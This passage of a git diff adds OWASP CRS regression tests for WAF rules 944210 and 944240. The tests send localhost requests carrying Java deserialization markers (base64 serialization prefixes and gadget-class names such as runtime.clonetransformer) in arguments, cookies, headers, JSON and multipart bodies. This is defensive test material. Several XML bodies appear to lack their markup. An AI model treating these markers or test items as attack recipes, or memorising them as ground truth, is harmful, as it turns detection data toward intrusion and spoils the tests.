-----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-15 + desc: "Content-Type multipart/form-data json arg value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-16 + desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + rO0ABQ + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-17 + desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + rO0ABQ + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-18 + desc: "Argument test includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-19 + desc: "Argument name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "KztAAU=test" + output: + log_contains: "id \"944210\"" + - test_title: 944210-20 + desc: "Cookie test includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=KztAAU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-21 + desc: "Cookie name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: KztAAU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-22 + desc: "Request header test includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: KztAAU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-23 + desc: "XML element includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-24 + desc: "XML attribute name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-25 + desc: "XML attribute value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-26 + desc: "XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-27 + desc: "Nested XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-28 + desc: "Content-Type text/plain includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-29 + desc: "Content-Type application/json arg value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"KztAAU\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-30 + desc: "Content-Type application/json arg name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"KztAAU\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-31 + desc: "Content-Type multipart/form-data json arg name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-32 + desc: "Content-Type multipart/form-data json arg value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-33 + desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + KztAAU + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-34 + desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + KztAAU + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-35 + desc: "Argument test includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-36 + desc: "Argument name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Cs7QAF=test" + output: + log_contains: "id \"944210\"" + - test_title: 944210-37 + desc: "Cookie test includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Cs7QAF + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-38 + desc: "Cookie name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Cs7QAF=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-39 + desc: "Request header test includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Cs7QAF + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-40 + desc: "XML element includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-41 + desc: "XML attribute name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-42 + desc: "XML attribute value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-43 + desc: "XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-44 + desc: "Nested XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-45 + desc: "Content-Type text/plain includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_title: 944210-46 + desc: "Content-Type application/json arg value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Cs7QAF\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-47 + desc: "Content-Type application/json arg name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Cs7QAF\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-48 + desc: "Content-Type multipart/form-data json arg name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-49 + desc: "Content-Type multipart/form-data json arg value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-50 + desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + Cs7QAF + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-51 + desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + Cs7QAF + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml new file mode 100644 index 00000000..69406997 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml @@ -0,0 +1,1703 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944240.yaml" + description: "Positive tests for rule 944240" +tests: + - test_title: 944240-1 + desc: "Argument test includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-2 + desc: "Argument name includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.clonetransformer=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-3 + desc: "Cookie test includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-4 + desc: "Cookie name includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.clonetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-5 + desc: "Request header test includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-6 + desc: "XML attribute value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-7 + desc: "XML element value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-8 + desc: "Nested XML element value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-9 + desc: "Content-Type text/plain includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-10 + desc: "Content-Type application/json arg value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.clonetransformer\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-11 + desc: "Content-Type application/json arg name includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.clonetransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-12 + desc: "Argument test includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-13 + desc: "Argument name includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.forclosure=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-14 + desc: "Cookie test includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 